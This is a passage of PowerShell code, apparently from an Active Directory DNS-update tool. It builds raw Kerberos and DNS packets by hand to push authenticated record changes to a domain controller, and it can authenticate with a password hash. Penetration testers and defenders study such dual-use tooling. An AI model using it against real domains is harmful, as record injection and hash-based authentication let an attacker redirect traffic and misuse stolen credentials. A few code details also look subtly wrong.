- [Byte[]]$authenticator_length2 = Get-ASN1LengthArrayLong ($parameter_length + 100 + $crealm_length.Count + $crealm_length2.Count +
- $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count + $subkey_length.Count +
- $subkey_length2.Count + $subkey_length3.Count + $subkey_length4.Count + $authenticator_length.Count)
-
- $packet_KerberosAuthenticator = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_KerberosAuthenticator.Add("Encoding",[Byte[]](0x62) + $authenticator_length2 + [Byte[]](0x30) + $authenticator_length)
- $packet_KerberosAuthenticator.Add("AuthenticatorVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAuthenticator.Add("AuthenticatorVNO",[Byte[]](0x05))
- $packet_KerberosAuthenticator.Add("CRealm_Encoding",[Byte[]](0xa1) + $crealm_length2 + [Byte[]](0x1b) + $crealm_length)
- $packet_KerberosAuthenticator.Add("CRealm",$realm)
- $packet_KerberosAuthenticator.Add("CName_Encoding",[Byte[]](0xa2) + $cname_length5 + [Byte[]](0x30) + $cname_length4)
- $packet_KerberosAuthenticator.Add("CName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAuthenticator.Add("CName_NameType",[Byte[]](0x01))
- $packet_KerberosAuthenticator.Add("CName_CNameString_Encoding",[Byte[]](0xa1) + $cname_length3 + [Byte[]](0x30) +
- $cname_length2 + [Byte[]](0x1b) + $cname_length)
- $packet_KerberosAuthenticator.Add("CName_CNameString",$username)
- $packet_KerberosAuthenticator.Add("CKSum_Encoding",[Byte[]](0xa3,0x25,0x30,0x23,0xa0,0x05,0x02,0x03))
- $packet_KerberosAuthenticator.Add("CKSum_CKSumType",[Byte[]](0x00,0x80,0x03))
- $packet_KerberosAuthenticator.Add("CKSum_Length_Encoding",[Byte[]](0xa1,0x1a,0x04,0x18))
- $packet_KerberosAuthenticator.Add("CKSum_Length",[Byte[]](0x10,0x00,0x00,0x00))
- $packet_KerberosAuthenticator.Add("CKSum_Bnd",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_KerberosAuthenticator.Add("CKSum_Flags",[Byte[]](0x36,0x01,0x00,0x00))
- $packet_KerberosAuthenticator.Add("CKSum_CUSec_Encoding",[Byte[]](0xa4,0x05,0x02,0x03))
- $packet_KerberosAuthenticator.Add("CKSum_CUSec",(Get-KerberosMicrosecond))
- $packet_KerberosAuthenticator.Add("CKSum_CTime_Encoding",[Byte[]](0xa5,0x11,0x18,0x0f))
- $packet_KerberosAuthenticator.Add("CKSum_CTime",(Get-KerberosTimestampUTC))
- $packet_KerberosAuthenticator.Add("CKSum_Subkey_Encoding",[Byte[]](0xa6) + $subkey_length4 + [Byte[]](0x30) + $subkey_length3)
- $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyType",[Byte[]](0x12))
- $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyValue_Encoding",[Byte[]](0xa1) + $subkey_length2 + [Byte[]](0x04) + $subkey_length)
- $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyValue",$subkey)
- $packet_KerberosAuthenticator.Add("CKSum_SEQNumber_Encoding",[Byte[]](0xa7,0x06,0x02,0x04))
- $packet_KerberosAuthenticator.Add("CKSum_SEQNumber",$sequence_number)
-
- return $packet_KerberosAuthenticator
- }
-
- function Get-KerberosTimestampUTC
- {
- [DateTime]$timestamp = (Get-Date).ToUniversalTime()
- [String]$timestamp = ("{0:u}" -f $timestamp) -replace "-","" -replace " ","" -replace ":",""
- [Byte[]]$timestamp = [System.Text.Encoding]::UTF8.GetBytes($timestamp)
-
- return $timestamp
- }
-
- function Get-KerberosMicrosecond
- {
- [Int]$microseconds = Get-Date -Format ffffff
- [Byte[]]$microseconds = [System.Bitconverter]::GetBytes($microseconds)[0..2]
-
- return $microseconds
- }
-
- function Protect-KerberosAES256CTS
- {
- param([Byte[]]$ke_key,[Byte[]]$data)
-
- $AES = New-Object "System.Security.Cryptography.AesManaged"
- $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
- $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
- $IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
- $AES.IV = $IV
- $AES.KeySize = 256
- $AES.Key = $ke_key
- $AES_encryptor = $AES.CreateEncryptor()
- $data_encrypted = $AES_encryptor.TransformFinalBlock($data,0,$data.Length)
- $block_count = [Math]::Ceiling($data_encrypted.Count / 16)
-
- if($block_count -gt 2)
- {
- $data_encrypted = $data_encrypted[0..($data_encrypted.Count - 33)] + $data_encrypted[($data_encrypted.Count - 16)..$data_encrypted.Count] +
- $data_encrypted[($data_encrypted.Count - 32)..($data_encrypted.Count - 17)]
- }
- elseif($blocks -eq 2)
- {
- $data_encrypted = $data_encrypted[16..31] + $data_encrypted[0..15]
- }
-
- $final_block_length = [Math]::Truncate($data.Count % 16)
-
- if($final_block_length -ne 0)
- {
- $remove_count = 16 - $final_block_length
- $data_encrypted = $data_encrypted[0..($data_encrypted.Count - $remove_count - 1)]
- }
-
- return $data_encrypted
- }
- # TCPClient Kerberos end
-
- function Get-KerberosHMACSHA1
- {
- param([Byte[]]$key,[Byte[]]$data)
-
- $HMAC_SHA1 = New-Object System.Security.Cryptography.HMACSHA1
- $HMAC_SHA1.key = $key
- $hash = $HMAC_SHA1.ComputeHash($data)
- $hash = $hash[0..11]
-
- return $hash
- }
-
- function Get-ASN1LengthArray
- {
- param([Int]$length)
-
- [Byte[]]$asn1 = [System.BitConverter]::GetBytes($length)
-
- if($asn1[1] -eq 0)
- {
- $asn1 = $asn1[0]
- }
- else
- {
- $asn1 = $asn1[1,0]
- }
-
- return $asn1
- }
-
- function Get-ASN1LengthArrayLong
- {
- param([Int]$length)
-
- [Byte[]]$asn1 = [System.BitConverter]::GetBytes($length)
-
- if($asn1[1] -eq 0)
- {
- $asn1 = $asn1[0]
- $asn1 = [Byte[]]0x81 + $asn1
- }
- else
- {
- $asn1 = $asn1[1,0]
- $asn1 = [Byte[]]0x82 + $asn1
- }
-
- return $asn1
- }
-
- function New-RandomByteArray
- {
- param([Int]$length,[Int]$minimum=1,[Int]$maximum=255)
-
- [String]$random = [String](1..$length | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum $minimum -Maximum $maximum)})
- [Byte[]]$random = $random.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
- return $random
- }
-
- function New-DNSNameArray
- {
- param([String]$name)
-
- $character_array = $name.ToCharArray()
- [Array]$index_array = 0..($character_array.Count - 1) | Where-Object {$character_array[$_] -eq '.'}
-
- if($index_array.Count -gt 0)
- {
-
- $name_start = 0
-
- ForEach ($index in $index_array)
- {
- $name_end = $index - $name_start
- [Byte[]]$name_array += $name_end
- [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start,$name_end))
- $name_start = $index + 1
- }
-
- [Byte[]]$name_array += ($name.Length - $name_start)
- [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start))
- }
- else
- {
- [Byte[]]$name_array = $name.Length
- [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start))
- }
-
- return $name_array
- }
-
- function New-PacketDNSQuery
- {
- param([Byte[]]$name,[byte[]]$type,[Byte[]]$apreq)
-
- [Byte[]]$transaction_id = New-RandomByteArray 2
-
- if($apreq)
- {
- $mechtoken_length = Get-ASN1LengthArrayLong ($apreq.Count)
- $mechtoken_length2 = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + 1)
- $innercontexttoken_length = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count + 17) # 31
- $innercontexttoken_length2 = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count +
- $innercontexttoken_length.Count + 18)
- $spnego_length = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count +
- $innercontexttoken_length.Count + $innercontexttoken_length2.Count + 27)
- $grouped_length = $apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count + $innercontexttoken_length.Count +
- $innercontexttoken_length2.Count + $spnego_length.Count + 25
- $key_size = [System.BitConverter]::GetBytes($grouped_length + 3)[1,0]
- $rd_length = [System.BitConverter]::GetBytes($grouped_length + $key_size.Count + 27)[1,0]
- $inception = [int64](([datetime]::UtcNow)-(Get-Date "1/1/1970")).TotalSeconds
- $inception = [System.BitConverter]::GetBytes($inception)
- $inception = $inception[3..0]
- }
-
- if($apreq)
- {
- [Byte[]]$length = [System.BitConverter]::GetBytes($grouped_length + $name.Count + 57)[1,0]
- }
- else
- {
- [Byte[]]$length = [System.BitConverter]::GetBytes($name.Count + 16)[1,0]
- }
-
- $packet_DNSQuery = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_DNSQuery.Add("Length",$length)
- $packet_DNSQuery.Add("TransactionID",$transaction_ID)
- $packet_DNSQuery.Add("Flags",[Byte[]](0x00,0x00))
- $packet_DNSQuery.Add("Questions",[Byte[]](0x00,0x01))
- $packet_DNSQuery.Add("AnswerRRs",[Byte[]](0x00,0x00))
- $packet_DNSQuery.Add("AuthorityRRs",[Byte[]](0x00,0x00))
-
- if($apreq)
- {
- $packet_DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x01))
- }
- else
- {
- $packet_DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x00))
- }
-
- $packet_DNSQuery.Add("Queries_Name",$name)
- $packet_DNSQuery.Add("Queries_Type",$type)
- $packet_DNSQuery.Add("Queries_Class",[Byte[]](0x00,0xff))
-
- if($apreq)
- {
- $packet_DNSQuery.Add("Queries_AdditionalRecords_Name",[Byte[]](0xc0,0x0c))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_Type",[Byte[]](0x00,0xf9))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_Class",[Byte[]](0x00,0xff))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_TTL",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RDLength",$rd_length)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Algorithm",[Byte[]](0x08,0x67,0x73,0x73,0x2d,0x74,0x73,0x69,0x67,0x00))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Inception",$inception)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Expiration",$inception)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Mode",[Byte[]](0x00,0x03))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Error",[Byte[]](0x00,0x00))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_KeySize",$key_size)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_Encoding",[Byte[]](0x60) + $spnego_length)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_ThisMech",[Byte[]](0x06,0x06,0x2b,0x06,0x01,0x05,0x05,0x02))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_Encoding",[Byte[]](0xa0) + $innercontexttoken_length2 + [Byte[]](0x30) +
- $innercontexttoken_length)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechTypes_Encoding",[Byte[]](0xa0,0x0d,0x30,0x0b))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechType0",[Byte[]](0x06,0x09,0x2a,0x86,0x48,0x86,0xf7,0x12,0x01,0x02,0x02))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechToken_Encoding",[Byte[]](0xa2) + $mechtoken_length2 + [Byte[]](0x04) +
- $mechtoken_length)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechToken_Token",$apreq)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_OtherSize",[Byte[]](0x00,0x00))
- }
-
- return $packet_DNSQuery
- }
-
- function New-PacketDNSUpdate
- {
- param([Byte[]]$transaction_ID,[String]$zone,[String]$name,[String]$type,[Int]$TTL,[Int]$preference,[Int]$priority,[Int]$weight,[Int]$port,[String]$data,[Byte[]]$time_signed,[Byte[]]$tkey_name,[Byte[]]$MAC)
-
- if($data)
- {
- $add = $true
- [Byte[]]$class = 0x00,0x01
- }
- else
- {
- [Byte[]]$class = 0x00,0xff
- $TTL = 0
- }
-
- switch ($type)
- {
-
- 'A'
- {
- [Byte[]]$type = 0x00,0x01
-
- if($data -and [Bool]($data -as [System.Net.IPAddress]))
- {
- [Byte[]]$data = ([System.Net.IPAddress][String]([System.Net.IPAddress]$data)).GetAddressBytes()
- }
- elseif($data)
- {
- [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
- }
-
- }
-
- 'AAAA'
- {
- [Byte[]]$type = 0x00,0x1c
-
- if($data -and [Bool]($data -as [System.Net.IPAddress]))
- {
- [Byte[]]$data = ([System.Net.IPAddress][String]([System.Net.IPAddress]$data)).GetAddressBytes()
- }
- elseif($data)
- {
- [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
- }
-
- }
-
- 'CNAME'
- {
- [Byte[]]$type = 0x00,0x05
-
- if($data -and [Bool]($data -as [System.Net.IPAddress]))
- {
- [Byte[]]$data = (New-DNSNameArray $data) + 0x00
- }
- elseif($data)
- {
- [Byte[]]$data = (New-DNSNameArray ($data -replace ('.' + $zone),'')) + 0xc0,0x0c
- }
-
- }
-
- 'MX'
- {
- $MX = $true
- [Byte[]]$type = 0x00,0x0f
-
- if($data)
- {
- $extra_length = 2
- [Byte[]]$preference = [System.Bitconverter]::GetBytes($preference)[1,0]
- }
-
- if($data -and [Bool]($data -as [System.Net.IPAddress]))
- {
- [Byte[]]$data = (New-DNSNameArray $data) + 0x00
- }
- elseif($data)
- {
- [Byte[]]$data = (New-DNSNameArray ($data -replace ('.' + $zone),'')) + 0xc0,0x0c
- }
-
- }
-
- 'PTR'
- {
- [Byte[]]$type = 0x00,0x0c
-
- if($data)
- {
- [Byte[]]$data = (New-DNSNameArray $data) + 0x00
- }
-
- }
-
- 'SRV'
- {
- $SRV = $true
- [Byte[]]$type = 0x00,0x21
-
- if($data)
- {
- [Byte[]]$priority = [System.Bitconverter]::GetBytes($priority)[1,0]
- [Byte[]]$weight = [System.Bitconverter]::GetBytes($weight)[1,0]
- [Byte[]]$port = [System.Bitconverter]::GetBytes($port)[1,0]
- $extra_length = 6
- [Byte[]]$data = (New-DNSNameArray $data) + 0x00
- }
-
- }
-
- 'TXT'
- {
- $TXT = $true
- [Byte[]]$type = 0x00,0x10
- [Byte[]]$TXT_length = [System.BitConverter]::GetBytes($data.Length)[0]
-
- if($data)
- {
- $extra_length = 1
- [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
- }
-
- }
-
- }
-
- if($name -eq $zone)
- {
- [Byte[]]$name = 0xc0,0x0c
- }
- else
- {
- [Byte[]]$name = (New-DNSNameArray ($name -replace ('.' + $zone),'')) + 0xc0,0x0c
- #[Byte[]]$name = (New-DNSNameArray $name) + 0x00
- }
-
- [Byte[]]$zone = (New-DNSNameArray $zone) + 0x00
- [Byte[]]$TTL = [System.Bitconverter]::GetBytes($TTL)[3..0]
- [Byte[]]$data_length = [System.BitConverter]::GetBytes($data.Length + $extra_length)[1,0]
-
- if($MAC)
- {
- [Byte[]]$length = [System.BitConverter]::GetBytes($zone.Count + $name.Count + $data.Length + $tkey_name.Count + $MAC.Count + 62 + $extra_length)[1,0]
- }
- elseif(!$tkey_name)
- {
- [Byte[]]$length = [System.BitConverter]::GetBytes($zone.Count + $name.Count + $data.Length + 26 + $extra_length)[1,0]
- }
-
- $packet_DNSUpdate = New-Object System.Collections.Specialized.OrderedDictionary
-
- if(!$tkey_name -or $MAC)
- {
- $packet_DNSUpdate.Add("Length",$length)
- }
-
- $packet_DNSUpdate.Add("TransactionID",$transaction_ID)
- $packet_DNSUpdate.Add("Flags",[Byte[]](0x28,0x00))
- $packet_DNSUpdate.Add("Zones",[Byte[]](0x00,0x01))
- $packet_DNSUpdate.Add("Prerequisites",[Byte[]](0x00,0x00))
- $packet_DNSUpdate.Add("Updates",[Byte[]](0x00,0x01))
-
- if($MAC)
- {
- $packet_DNSUpdate.Add("AdditionalRRs",[Byte[]](0x00,0x01))
- }
- else
- {
- $packet_DNSUpdate.Add("AdditiionalRRs",[Byte[]](0x00,0x00))
- }
-
- $packet_DNSUpdate.Add("Zone_Name",$zone)
- $packet_DNSUpdate.Add("Zone_Type",[Byte[]](0x00,0x06))
- $packet_DNSUpdate.Add("Zone_Class",[Byte[]](0x00,0x01))
- $packet_DNSUpdate.Add("Updates_Name",$name)
- $packet_DNSUpdate.Add("Updates_Type",$type)
- $packet_DNSUpdate.Add("Updates_Class",$class)
- $packet_DNSUpdate.Add("Updates_TTL",$TTL)
- $packet_DNSUpdate.Add("Updates_DataLength",$data_length)
-
- if($MX)
- {
- $packet_DNSUpdate.Add("Updates_TXTLength",$preference)
- }
-
- if($TXT -and $add)
- {
- $packet_DNSUpdate.Add("Updates_TXTLength",$TXT_length)
- }
-
- if($SRV -and $add)
- {
- $packet_DNSUpdate.Add("Updates_Priority",$priority)
- $packet_DNSUpdate.Add("Updates_Weight",$weight)
- $packet_DNSUpdate.Add("Updates_Port",$port)
- }
-
- if($add)
- {
- $packet_DNSUpdate.Add("Updates_Address",$data)
- }
-
- if($tkey_name)
- {
- $packet_DNSUpdate.Add("AdditionalRecords_Name",$tkey_name)
-
- if($MAC)
- {
- $packet_DNSUpdate.Add("AdditionalRecords_Type",[Byte[]](0x00,0xfa))
- }
-
- $packet_DNSUpdate.Add("AdditionalRecords_Class",[Byte[]](0x00,0xff))
- $packet_DNSUpdate.Add("AdditionalRecords_TTL",[Byte[]](0x00,0x00,0x00,0x00))
-
- if($MAC)
- {
- $packet_DNSUpdate.Add("AdditionalRecords_DataLength",[Byte[]](0x00,0x36))
- }
-
- $packet_DNSUpdate.Add("AdditionalRecords_AlgorithmName",[Byte[]](0x08,0x67,0x73,0x73,0x2d,0x74,0x73,0x69,0x67,0x00))
- $packet_DNSUpdate.Add("AdditionalRecords_TimeSigned",$time_signed)
- $packet_DNSUpdate.Add("AdditionalRecords_Fudge",[Byte[]](0x01,0x2c))
-
- if($MAC)
- {
- $packet_DNSUpdate.Add("AdditionalRecords_MACSize",[Byte[]](0x00,0x1c))
- $packet_DNSUpdate.Add("AdditionalRecords_MAC",$MAC)
- $packet_DNSUpdate.Add("AdditionalRecords_OriginalID",$transaction_ID)
- }
-
- $packet_DNSUpdate.Add("AdditionalRecords_Error",[Byte[]](0x00,0x00))
- $packet_DNSUpdate.Add("AdditionalRecords_OtherLength",[Byte[]](0x00,0x00))
- }
-
- return $packet_DNSUpdate
- }
-
- function New-PacketDNSUpdateMAC
- {
- param([Byte[]]$flags,[Byte[]]$sequence_number,[Byte[]]$checksum)
-
- $packet_DNSUpdateMAC = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_DNSUpdateMAC.Add("DNSUpdateMAC_TokenID",[Byte[]](0x04,0x04))
- $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Flags",$flags)
- $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Filler",[Byte[]](0xff,0xff,0xff,0xff,0xff))
- $packet_DNSUpdateMAC.Add("DNSUpdateMAC_SequenceNumber",[Byte[]](0x00,0x00,0x00,0x00) + $sequence_number)
-
- if($checksum)
- {
- $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Checksum",$checksum)
- }
-
- return $packet_DNSUpdateMAC
- }
-
- function Get-DNSUpdateResponseStatus
- {
- param([Byte[]]$DNS_client_receive)
-
- $DNS_response_flags = [System.BitConverter]::ToString($DNS_client_receive[4..5])
- $DNS_response_flags = $DNS_response_flags -replace "-",""
-
- switch ($DNS_response_flags)
- {
- 'A800' {$DNS_update_response_status = "[+] DNS update successful"}
- 'A801' {$DNS_update_response_status = ("[-] format error 0x" + $DNS_response_flags)}
- 'A802' {$DNS_update_response_status = ("[-] failed to complete 0x" + $DNS_response_flags)}
- 'A804' {$DNS_update_response_status = ("[-] not implemented 0x" + $DNS_response_flags)}
- 'A805' {$DNS_update_response_status = ("[-] update refused 0x" + $DNS_response_flags)}
- Default {$DNS_update_response_status = ("[-] DNS update was not successful 0x" + $DNS_response_flags)}
- }
-
- return $DNS_update_response_status
- }
-
- $DNS_client = New-Object System.Net.Sockets.TCPClient
- $DNS_client.Client.ReceiveTimeout = 3000
-
- if($Security -ne 'Secure')
- {
-
- try
- {
- $DNS_client.Connect($DomainController,"53")
- }
- catch
- {
- Write-Output "$DomainController did not respond on TCP port 53"
- }
-
- if($DNS_client.Connected)
- {
- $DNS_client_stream = $DNS_client.GetStream()
- $DNS_client_receive = New-Object System.Byte[] 2048
- [Byte[]]$transaction_id = New-RandomByteArray 2
- $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData
- [Byte[]]$DNSUpdate = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
- $DNS_client_send = $DNSUpdate
- $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
- $DNS_client_stream.Flush()
- $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
- $DNS_update_response_status = Get-DNSUpdateResponseStatus $DNS_client_receive
- Write-Output $DNS_update_response_status
- $DNS_client.Close()
- $DNS_client_stream.Close()
- }
-
- }
-
- if($Security -eq 'Secure' -or ($Security -eq 'Auto' -and $DNS_update_response_status -like '*0xA805'))
- {
- $tkey = "6" + ((0..9) | Get-Random -Count 2) + "-ms-7.1-" + ((0..9) | Get-Random -Count 4) + "." + ((0..9) | Get-Random -Count 8) +
- "-" + ((0..9) | Get-Random -Count 4) + "-11e7-" + ((0..9) | Get-Random -Count 4) + "-000c296694e0"
- $tkey = $tkey -replace " ",""
- Write-Verbose "[+] TKEY name $tkey"
- [Byte[]]$tkey_name = [System.Text.Encoding]::UTF8.GetBytes($tkey)
- $tkey_name = [Byte[]]0x08 + $tkey_name + 0x00
- $tkey_name[9] = 0x06
- $tkey_name[16] = 0x24
-
- if($kerberos_tcpclient)
- {
- $kerberos_client = New-Object System.Net.Sockets.TCPClient
- $kerberos_client.Client.ReceiveTimeout = 3000
- $domain_controller = [System.Text.Encoding]::UTF8.GetBytes($DomainController)
- $kerberos_username = [System.Text.Encoding]::UTF8.GetBytes($Username)
- $kerberos_realm = [System.Text.Encoding]::UTF8.GetBytes($Realm)
-
- try
- {
- $kerberos_client.Connect($DomainController,"88")
- }
- catch
- {
- Write-Output "$DomainController did not respond on TCP port 88"
- }
-
- }
-
- if(!$kerberos_tcpclient -or $kerberos_client.Connected)
- {
-
- if($kerberos_tcpclient)
- {
-
- if($Hash)
- {
- $base_key = (&{for ($i = 0;$i -lt $hash.Length;$i += 2){$hash.SubString($i,2)}}) -join "-"
- $base_key = $base_key.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- }
- else
- {
- $base_key = Get-KerberosAES256BaseKey $salt $password
- }
-
- $ke_key = Get-KerberosAES256UsageKey encrypt 1 $base_key
- $ki_key = Get-KerberosAES256UsageKey integrity 1 $base_key
- $nonce = New-RandomByteArray 4
- $kerberos_client_stream = $kerberos_client.GetStream()
- $kerberos_client_receive = New-Object System.Byte[] 2048
- $packet_AS_REQ = New-PacketKerberosASREQ $kerberos_username $kerberos_realm $domain_controller $nonce
- $AS_REQ = ConvertFrom-PacketOrderedDictionary $packet_AS_REQ
- $kerberos_client_send = $AS_REQ
- $kerberos_client_stream.Write($kerberos_client_send,0,$kerberos_client_send.Length) > $null
- $kerberos_client_stream.Flush()
- $kerberos_client_stream.Read($kerberos_client_receive,0,$kerberos_client_receive.Length) > $null
- [Byte[]]$PAC_Timestamp = New-KerberosPACTimestamp $ke_key
- [Byte[]]$PAC_ENC_Timestamp = Protect-KerberosAES256CTS $ke_key $PAC_Timestamp
- [Byte[]]$PAC_Timestamp_Signature = Get-KerberosHMACSHA1 $ki_key $PAC_Timestamp
- $packet_AS_REQ = New-PacketKerberosASREQ $kerberos_username $kerberos_realm $domain_controller $nonce $PAC_ENC_Timestamp $PAC_Timestamp_Signature
- $AS_REQ = ConvertFrom-PacketOrderedDictionary $packet_AS_REQ
- $kerberos_client_send = $AS_REQ
- $kerberos_client_stream.Write($kerberos_client_send,0,$kerberos_client_send.Length) > $null
- $kerberos_client_stream.Flush()
- $kerberos_client_stream.Read($kerberos_client_receive,0,$kerberos_client_receive.Length) > $null
- $asrep_payload = [System.BitConverter]::ToString($kerberos_client_receive)
- $asrep_payload = $asrep_payload -replace "-",""
- $kerberos_client.Close()
- $kerberos_client_stream.Close()
- }
- else
- {
-
- try
- {
-
- $Null = [System.Reflection.Assembly]::LoadWithPartialName("System.IdentityModel")
-
- if($username)
- {
- $creds = New-Object System.Management.Automation.PSCredential ($username,$Password)
- $network_creds = $creds.GetNetworkCredential()
- $network_creds.Domain = $domain
- $token = New-Object System.IdentityModel.Selectors.KerberosSecurityTokenProvider ("DNS/$DomainController",[System.Security.Principal.TokenImpersonationLevel]::Impersonation,$network_creds)
- $ticket = $token.GetToken([System.TimeSpan]::FromMinutes(1))
- }
- else
- {
- $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken ("DNS/$DomainController")
- }
-
- $asrep_key = $ticket.SecurityKey.GetSymmetricKey()
- $kerberos_client_receive = $Ticket.GetRequest()
- $asrep_payload = [System.BitConverter]::ToString($kerberos_client_receive)
- $asrep_payload = $asrep_payload -replace "-",""
- }
- catch
- {
- $auth_success = $false
- }
-
- }
-
- if($asrep_key -or ($asrep_payload.Length -gt 0 -and $asrep_payload -like '*A003020105A10302010B*'))
- {
- Write-Verbose "[+] Kerberos preauthentication successful"
- $auth_success = $true
- }
- elseif($asrep_payload.Length -gt 0 -and $asrep_payload -like '*A003020105A10302011E*')
- {
- Write-Output ("[-] Kerberos preauthentication error 0x" + $asrep_payload.Substring(96,2))
- $auth_success = $false
- }
- else
- {
- Write-Output "[-] Kerberos authentication failure"
- $auth_success = $false
- }
-
- if($auth_success)
- {
- $ticket_index = $asrep_payload.IndexOf("A003020112A1030201")
- $ticket_kvno = $kerberos_client_receive[($ticket_index / 2 + 9)]
-
- if($asrep_payload.Substring($ticket_index + 22,2) -eq '82')
- {
- $ticket_length = ([System.BitConverter]::ToUInt16($kerberos_client_receive[($ticket_index / 2 + 13)..($ticket_index / 2 + 12)],0)) - 4
- }
- else
- {
- $ticket_length = $kerberos_client_receive[($ticket_index / 2 + 12)] - 3
- }
-
- $ticket = $Kerberos_client_receive[($ticket_index / 2 + 18)..($ticket_index/2 + 17 + $ticket_length)]
-
- if($kerberos_tcpclient)
- {
- $cipher_index = $asrep_payload.Substring($ticket_index + 1).IndexOf("A003020112A1030201") + $ticket_index + 1
-
- if($asrep_payload.Substring($cipher_index + 22,2) -eq '82')
- {
- $cipher_length = ([System.BitConverter]::ToUInt16($kerberos_client_receive[($cipher_index / 2 + 13)..($cipher_index / 2 + 12)],0)) - 4
- }
- else
- {
- $cipher_length = $kerberos_client_receive[($cipher_length / 2 + 12)] - 3
- }
-
- $cipher = $kerberos_client_receive[($cipher_index / 2 + 18)..($cipher_index / 2 + 17 + $cipher_length)]
- $ke_key = Get-KerberosAES256UsageKey encrypt 3 $base_key
- $asrep_cleartext = Unprotect-KerberosASREP $ke_key $cipher[0..($cipher.Count - 13)]
- $kerberos_session_key = $asrep_cleartext[37..68]
- $ke_key = Get-KerberosAES256UsageKey encrypt 11 $kerberos_session_key
- $ki_key = Get-KerberosAES256UsageKey integrity 11 $kerberos_session_key
- [Byte[]]$subkey = New-RandomByteArray 32
- [Byte[]]$sequence_number = New-RandomByteArray 4
- $packet_authenticator = New-KerberosAuthenticator $kerberos_realm $kerberos_username $subkey $sequence_number
- [Byte[]]$authenticator = ConvertFrom-PacketOrderedDictionary $packet_authenticator
- $authenticator = (New-RandomByteArray 16) + $authenticator
- $authenticator_encrypted = Protect-KerberosAES256CTS $ke_key $authenticator
- $authenticator_signature = Get-KerberosHMACSHA1 $ki_key $authenticator
- $packet_apreq = New-PacketKerberosAPREQ $kerberos_realm $domain_controller $ticket_kvno $ticket $authenticator_encrypted $authenticator_signature
- [Byte[]]$apreq = ConvertFrom-PacketOrderedDictionary $packet_apreq
- [Byte[]]$mac_flags = 0x04
- }
- else
- {
- [Byte[]]$apreq = $kerberos_client_receive
- [Byte[]]$mac_flags = 0x00
- }
-
- $packet_DNSQuery = New-PacketDNSQuery $tkey_name 0x00,0xf9 $apreq
- $DNSQueryTKEY = ConvertFrom-PacketOrderedDictionary $packet_DNSQuery
- $DNS_client = New-Object System.Net.Sockets.TCPClient
- $DNS_client.Client.ReceiveTimeout = 3000
-
- try
- {
- $DNS_client.Connect($DomainController,"53")
- }
- catch
- {
- Write-Output "$DomainController did not respond on TCP port 53"
- }
-
- if($DNS_client.Connected)
- {
- $DNS_client_stream = $DNS_client.GetStream()
- $DNS_client_receive = New-Object System.Byte[] 2048
- $DNS_client_send = $DNSQueryTKEY
- $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
